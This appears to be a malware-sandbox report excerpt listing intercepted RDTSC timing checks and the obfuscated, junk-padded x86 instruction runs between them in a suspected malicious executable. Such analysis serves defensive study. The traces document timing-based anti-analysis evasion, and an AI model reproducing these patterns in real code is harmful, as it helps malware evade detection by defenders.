                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A97FF1 second address: A98019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5D20D3D696h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98019 second address: A98021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98021 second address: A9802A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9802A second address: A98030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98030 second address: A98043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D68Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98320 second address: A98337 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F5D20C2475Eh 0x0000000f jp 00007F5D20C24756h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98337 second address: A98354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20D3D68Fh 0x00000009 jmp 00007F5D20D3D68Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98354 second address: A98370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24768h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A984B6 second address: A984BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A984BA second address: A984C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F5D20C24756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98612 second address: A9864C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F5D20D3D686h 0x00000014 jng 00007F5D20D3D686h 0x0000001a jno 00007F5D20D3D686h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5D20D3D697h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98935 second address: A98967 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnp 00007F5D20C24756h 0x0000000b pop edi 0x0000000c jmp 00007F5D20C2475Ch 0x00000011 pop edx 0x00000012 pop eax 0x00000013 js 00007F5D20C2477Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5D20C24760h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98967 second address: A9896B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98F2F second address: A98F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A98F35 second address: A98F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9056F second address: A9057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F5D20C24756h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9057E second address: A9058D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9058D second address: A90592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A90592 second address: A9059E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5D20D3D686h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9059E second address: A905AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F5D20C24762h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A905AB second address: A905B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A6140B second address: A61414 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A61414 second address: A6144A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D697h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5D20D3D68Bh 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 jg 00007F5D20D3D686h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9980E second address: A99812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99812 second address: A99818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99B1F second address: A99B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99B23 second address: A99B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99DE2 second address: A99DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A99DE7 second address: A99DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D20D3D68Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9D130 second address: A9D13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F5D20C24758h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9D13F second address: A9D14A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5D20D3D686h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9F37D second address: A9F387 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9E877 second address: A9E87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A9E87B second address: A9E881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A682A2 second address: A682A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7ADA second address: AA7AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7AE3 second address: AA7AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D697h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7AFE second address: AA7B08 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5D20C24756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7C63 second address: AA7C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7C67 second address: AA7C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA7C6F second address: AA7C74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8356 second address: AA835A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA835A second address: AA8360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8360 second address: AA837B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5D20C24761h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA837B second address: AA839B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F5D20D3D686h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA839B second address: AA83B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5D20C24756h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D20C2475Ah 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA850D second address: AA851A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F5D20D3D68Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8D86 second address: AA8D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C24762h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8D9C second address: AA8DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E27 second address: AA8E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E2C second address: AA8E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E32 second address: AA8E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E3E second address: AA8E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D20D3D696h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA8E5D second address: AA8E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D20C24768h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA90A1 second address: AA90A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA90A7 second address: AA90AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA9ED2 second address: AA9ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA9ED6 second address: AA9EEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007F5D20C24756h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA9FC6 second address: AA9FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AA9FCC second address: AA9FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA070 second address: AAA07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5D20D3D686h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA07F second address: AAA083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA083 second address: AAA0A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D691h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c je 00007F5D20D3D68Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA1E2 second address: AAA1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA1E6 second address: AAA1F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAA1F0 second address: AAA1FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5D20C24756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAB03C second address: AAB040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAB040 second address: AAB0D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F5D20C2475Bh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F5D20C24758h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 jmp 00007F5D20C24767h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F5D20C24758h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 or dword ptr [ebp+122D1A33h], esi 0x0000004f push 00000000h 0x00000051 add dword ptr [ebp+122D2106h], esi 0x00000057 xchg eax, ebx 0x00000058 jnl 00007F5D20C2475Eh 0x0000005e push eax 0x0000005f push esi 0x00000060 jbe 00007F5D20C2475Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAAF08 second address: AAAF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AACA46 second address: AACA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AACA4A second address: AACA7B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5D20D3D68Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F5D20D3D6A5h 0x00000011 pushad 0x00000012 jmp 00007F5D20D3D697h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAE22E second address: AAE2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D3241h], eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F5D20C24758h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a movzx esi, si 0x0000002d or si, 7300h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F5D20C24758h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D2106h], ebx 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007F5D20C24758h 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAED91 second address: AAEDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jnc 00007F5D20D3D68Ch 0x0000000d popad 0x0000000e push eax 0x0000000f jl 00007F5D20D3D694h 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAEDB0 second address: AAEDB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAEB93 second address: AAEB99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAEB99 second address: AAEB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF8BC second address: AAF8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF8C1 second address: AAF8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF8C7 second address: AAF8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF8CB second address: AAF950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F5D20C24758h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add dword ptr [ebp+122D1BA4h], esi 0x0000002b push 00000000h 0x0000002d mov esi, dword ptr [ebp+122D2C55h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F5D20C24758h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f jmp 00007F5D20C24766h 0x00000054 push eax 0x00000055 jnp 00007F5D20C2477Fh 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F5D20C24761h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AAF5E1 second address: AAF5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F5D20D3D68Ch 0x0000000f js 00007F5D20D3D686h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB3C3C second address: AB3C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB59E6 second address: AB5A50 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5D20D3D688h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F5D20D3D688h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call 00007F5D20D3D68Eh 0x0000002c and edi, dword ptr [ebp+122D320Ch] 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+124548A2h], esi 0x0000003b push 00000000h 0x0000003d movsx edi, bx 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F5D20D3D695h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB5A50 second address: AB5A5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB5A5A second address: AB5A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB7AFF second address: AB7B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24760h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F5D20C24756h 0x0000000f rdtsc
